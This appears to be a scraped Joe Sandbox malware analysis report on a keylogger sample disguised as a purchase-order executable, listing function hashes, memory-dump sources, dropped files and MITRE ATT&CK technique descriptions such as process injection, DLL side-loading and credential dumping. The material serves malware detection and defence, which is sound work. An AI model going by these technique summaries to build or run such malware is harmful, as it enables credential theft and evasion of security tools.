Instruction Fuzzy Hash: 77E0DF36D20226CBD711A7A098040EEBF34AE92211B14865BC06132081EB20220E87A1

Function 02966739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 354312f185b7651d27c7ae182824cd471941074568e87bb13d622d051e3e0a13
Instruction ID: 0357279ad65519320ef361718cd2bcf6fb07b4e5d079f0e01252c655d2993e6d
Opcode Fuzzy Hash: 354312f185b7651d27c7ae182824cd471941074568e87bb13d622d051e3e0a13
Instruction Fuzzy Hash: D7D05E7051D3458FD742B370E8864453B62EBC1105708B672D1415FB9FEE35AD5BCB62

Function 0296FF89 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e7399dfae19cb2eea0c66a68663bb2c374389de75454d6562a7978b2ba6d94
Instruction ID: 11ab4b19edb250e87f5696c4650e17e26d121a9cf8554e4c350eb77faa4ee812
Opcode Fuzzy Hash: 08e7399dfae19cb2eea0c66a68663bb2c374389de75454d6562a7978b2ba6d94
Instruction Fuzzy Hash: C5D05B321197900FC7579738F800D8E7BF65DC72103454AABD589C7556D6E4DD4583A1

Function 029628B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffd98b367828adaf33fe02f54e71c7831fa0278dedbf815a3e116934736d39b
Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
Opcode Fuzzy Hash: cffd98b367828adaf33fe02f54e71c7831fa0278dedbf815a3e116934736d39b
Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1

Function 02968EF6 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0b6eb6db0b8214c5fc4e7c2cddf34af81bc7120913360f6d9d204f59382137
Instruction ID: 64c809423a0575a6371785db17d84cd07deae23dc570fe744b737a33d156b862
Opcode Fuzzy Hash: 5c0b6eb6db0b8214c5fc4e7c2cddf34af81bc7120913360f6d9d204f59382137
Instruction Fuzzy Hash: 78C0123364D0242EA324104E7C44AF36BCDD3C12F4B110137FA5CD7200EC464C8641E4

Function 0296AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb253eb1df8002987aa11837e003ec1794ad97d63d5aa9b0d7282c94106447d
Instruction ID: f58701b5efa1c144fe0764b3bd837fe5ae522d928e104138cc8aa0f70d66568b
Opcode Fuzzy Hash: 0cb253eb1df8002987aa11837e003ec1794ad97d63d5aa9b0d7282c94106447d
Instruction Fuzzy Hash: 8ED0673BB00008EFDB049F99E8409DDF776FB98221B048116E915A3264C631A965DB54

Function 02966748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c07ab4653df29b399ea7727a2647e1e6d261c665c3688c6968f713efb0e9e0e
Instruction ID: f2ddc6f24fb30ffb51ea7c06ebfbbfdcb2327d713c8f9dfbd936442106c0f736
Opcode Fuzzy Hash: 9c07ab4653df29b399ea7727a2647e1e6d261c665c3688c6968f713efb0e9e0e
Instruction Fuzzy Hash: 1DC08C3011930A4FD641F772FC49919336EEBC0200B449630E2090EB4EEFB8BD568B92

Non-executed Functions

Function 0296FA88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2b505dfad6aca2d0d501d95d499dae5157d5c351a910a9876fe6310ad20831
Instruction ID: e75f8e61dbdcac78366aa1e2542634d752304faabbcc20b66ead8ac71cef2238
Opcode Fuzzy Hash: 0d2b505dfad6aca2d0d501d95d499dae5157d5c351a910a9876fe6310ad20831
Instruction Fuzzy Hash: 61C1A074E00218CFDB14DFA5D994BADBBB2BF89304F1081AAD819AB355DB359E81CF50

Function 0296F630 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b9ed7955eee12ddb0dbdf2eb4aef2a4a56d176ebef99740c20f73fadf9b698
Instruction ID: 09ae3000185bd824cfbe7608c13dda14775a46d4013e4da41d71e6ebd0412f5f
Opcode Fuzzy Hash: 41b9ed7955eee12ddb0dbdf2eb4aef2a4a56d176ebef99740c20f73fadf9b698
Instruction Fuzzy Hash: EFC1A074E00218CFDB14DFA5D994BADBBB2BF89304F2081A9D819AB355DB359E81CF50

Function 029626A0 Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

F, xrefs: 02962708
+yp^, xrefs: 029626ED, 029626F2
F, xrefs: 02962732
F, xrefs: 0296274F

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID: +yp^$F$F$F
API String ID: 0-997278298
Opcode ID: f16b1f3781fda9e780b57c66dc56580c57328e98430f917ad74d5b603e978906
Instruction ID: 3ec403a9b6e9c419efd864797bc2b5e0fe6b77e97d079887eb567e518bf16015
Opcode Fuzzy Hash: f16b1f3781fda9e780b57c66dc56580c57328e98430f917ad74d5b603e978906
Instruction Fuzzy Hash: 01219274E04209DFDB05EFB9C4446AEB7F2EF86304F108469C415AB395CB349A02CF51

Function 029624C0 Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

F, xrefs: 02962552
Kyp^, xrefs: 0296250D, 02962512
F, xrefs: 02962528
F, xrefs: 0296256F

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID: F$F$F$Kyp^
API String ID: 0-1898633392
Opcode ID: a76131f9acb01d0f6caced592c4ea7eb1689837cec1d37eba6390727193f97bb
Instruction ID: 926b92052ffb925eb50a1571c7e4bf1edd6fc5e6fb8ebf09630f18077f42b9bb
Opcode Fuzzy Hash: a76131f9acb01d0f6caced592c4ea7eb1689837cec1d37eba6390727193f97bb
Instruction Fuzzy Hash: 432150B4E04208DFDB05EFB9C8556AEB7F2EF8A304F1084A9D415AB385DB349A06CF41

Function 029625B0 Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

F, xrefs: 0296265F
F, xrefs: 02962618
;yp^, xrefs: 029625FD, 02962602
F, xrefs: 02962642

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID: ;yp^$F$F$F
API String ID: 0-3574583114
Opcode ID: 5f6aa581c810dc5ca642b5b97589df758c3f60ea2c3be838ed234c71daca37e7
Instruction ID: 88df8300839249f0e698a55d1dea721a0166db1fc166af3510f43b16495fbb7d
Opcode Fuzzy Hash: 5f6aa581c810dc5ca642b5b97589df758c3f60ea2c3be838ed234c71daca37e7
Instruction Fuzzy Hash: 352192B4E05209DFDB05EFB9C4546AEBBF2EF86304F1084AAC415AB395CB385A42CF51

Function 029623D0 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

F, xrefs: 02962438
F, xrefs: 0296247F
F, xrefs: 02962462
[yp^, xrefs: 0296241D, 02962422

Memory Dump Source

Source File: 00000006.00000002.3791000969.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2960000_Purchase Order 007823-PO# 005307.jbxd

Similarity

API ID:
String ID: F$F$F$[yp^
API String ID: 0-385107070
Opcode ID: e6b1277636cdc45da0b6518cb53d304ed445a7efc054a781ade5cbf8cb436ba4
Instruction ID: d08b15d8202e58e4bff423c01d0c781cfef2a8f891f798dca41c0659e6fd2652
Opcode Fuzzy Hash: e6b1277636cdc45da0b6518cb53d304ed445a7efc054a781ade5cbf8cb436ba4
Instruction Fuzzy Hash: D2216D74E05208DFDB05EFB9C4446AEB7F2FB86304F1084AAC415AB785DB349A06CF41

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Purchase Order 007823-PO# 005307.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 007823-PO# 005307.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uc3aff3.3au.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drgocfdm.ome.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5dibwtq.ktp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ku0m5kgt.vp3.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Purchase Order 007823-PO# 005307.exe

Function 00B8D030 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Function 00B8D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 066D49DC Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Function 066D49E8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00B8ADA8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 00B8590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 00B844C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 066D40DA Relevance: 1.6, APIs: 1, Instructions: 81
threadCOMMON

Function 066D4758 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Function 066D4760 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 066D4848 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 066D418A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 00B8D689 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 066D4850 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 066D4190 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre